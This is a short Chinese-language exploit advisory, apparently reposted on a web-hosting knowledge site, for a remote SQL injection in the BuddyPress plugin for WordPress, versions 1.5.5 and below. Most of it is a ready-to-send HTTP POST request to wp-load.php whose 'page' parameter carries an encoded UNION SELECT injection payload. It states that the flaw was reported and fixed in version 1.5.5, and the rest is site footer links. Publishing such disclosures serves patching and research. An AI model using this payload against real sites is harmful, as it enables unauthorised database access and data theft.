标题: Buddypress plugin of Wordpress remote SQL Injection
作者: Ivan Terkin
类型: Remote Exploit
漏洞: Remote SQL Injection
软件下载地址: buddypress.org
影响版本: 1.5.5及以下
测试平台: Buddypress 1.5.4
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: www.xxxx.com
Accept: */*
Referer: http://www.badguest.cn /activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
修复方案:
已经报告给官方并且在 1.5.5版进行了修复
渝公网安备 50024202000196号
域名注册知识
虚拟主机知识
网站建设知识
网络推广知识
网络营销知识
常见技术问题
QQ空间
新浪微博
开心网
人人网